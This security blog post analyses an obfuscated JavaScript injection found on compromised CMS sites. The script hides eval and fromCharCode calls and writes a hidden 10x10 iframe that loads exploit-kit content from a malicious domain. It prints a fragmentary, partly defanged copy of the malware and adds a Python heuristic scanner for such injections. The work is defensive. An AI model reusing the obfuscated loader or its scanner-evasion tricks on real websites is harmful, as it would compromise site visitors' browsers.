The Latest in IT Security

Malware Infections from rebotstat dot com


We are starting to share some of our research on, and view of, web-based malware online. The #1 infection we have seen in the last few days is caused by a heavily encoded piece of JavaScript malware:

<!- o -><script>b=new function()
{return 2;};if(!+b)String.prototype.vqwfbeweb=’h’+’arC’;for(i 
in $=’b4h3tbn’)
if(i==’vqwfbeweb’)m=$[i];try{new Object().wehweh();}catch(q)
{s=String[“fr”+”omC”+m+”od”+’e’];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd=’e’;if({}.asd===’e’)a=document[“c”+”r”+”e”+”a”+”
for(i=0;i<n.length;i++)ss +=s(e val(“n”+”[i”+”]”));
if(!+b) e val(ss);</script><!- c ->

We are seeing this code added to the bottom of many compromised sites (from WordPress to Joomla, and many others). The code creates an iframe element that points to the site:

document.write(“<i frame src=’’ width=’10′ height=’10′

From there, more malware is loaded and the browser visiting the site gets compromised (or at least that’s the goal of the attackers).

So if you are visiting a site and your antivirus is complaining about “Black Hole Exploit kit” or similar names, the site could be compromised with this malware. You can scan a site here to verify: This is how our scanner classifies this malware:

*Note that we are seeing multiple variations of this type of malware (and different domains), but this latest one is the most common now.
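
Because the domains and variations change, a check for this infection is better keyed to the two traits described above: identifier names such as fromCharCode split into concatenated string pieces, and a 10x10 iframe. The following is an added example, not the original author's scanner; the function names, the 10-pixel threshold and the sample inputs are assumptions constructed for illustration.

```python
import re

# Names the sample above rebuilds from string pieces to hide them from scanners.
SENSITIVE = ("fromCharCode", "createElement", "eval")
# Blog rendering turns quotes in pasted samples into typographic ones; undo that.
QUOTES = str.maketrans({"’": "'", "‘": "'", "′": "'", "“": '"', "”": '"'})
LITERAL = r"""['"][^'"\n]{0,20}['"]"""
# Two or more short string literals joined with '+', e.g. "fr"+"omC".
CONCAT = re.compile(LITERAL + r"(?:\s*\+\s*" + LITERAL + r")+")
IFRAME = re.compile(r"<\s*i\s?frame\b[^>]*", re.I)  # also matches defanged "i frame"
DIM = re.compile(r"\b(width|height)\s*=\s*['\"]?(\d+)", re.I)
MAX_HIDDEN_PX = 10  # assumption: the page's iframe is 10x10; tune for your site

def split_identifiers(text):
    """Return pieces of SENSITIVE names that were assembled by concatenation."""
    hits = []
    for match in CONCAT.finditer(text.translate(QUOTES)):
        joined = "".join(re.findall(r"""['"]([^'"\n]*)['"]""", match.group(0)))
        # Require 4+ characters so ordinary short joins such as 'a'+'b' are ignored.
        if len(joined) >= 4 and any(joined in name for name in SENSITIVE):
            hits.append(joined)
    return hits

def tiny_iframes(text):
    """Return iframe tags whose width and height are both at most MAX_HIDDEN_PX."""
    hits = []
    for match in IFRAME.finditer(text.translate(QUOTES)):
        dims = {k.lower(): int(v) for k, v in DIM.findall(match.group(0))}
        if len(dims) == 2 and max(dims.values()) <= MAX_HIDDEN_PX:
            hits.append(match.group(0))
    return hits

def scan(text):
    return {"split_identifiers": split_identifiers(text), "tiny_iframes": tiny_iframes(text)}

# Constructed inputs: inert fragments quoted from the sample above, plus a benign page.
SAMPLE = """<script>String.prototype.vqwfbeweb='h'+'arC';
s=String["fr"+"omC"+m+"od"+'e'];</script>
<iframe src='http://example.invalid/' width='10' height='10'></iframe>"""
CLEAN = """<script>var msg = 'Hello, ' + 'world';</script>
<iframe src="/video" width="560" height="315"></iframe>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
    print(scan(CLEAN))
```

Both checks are heuristics: a hit means the file deserves manual review, and a clean result does not rule out a differently encoded variant.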
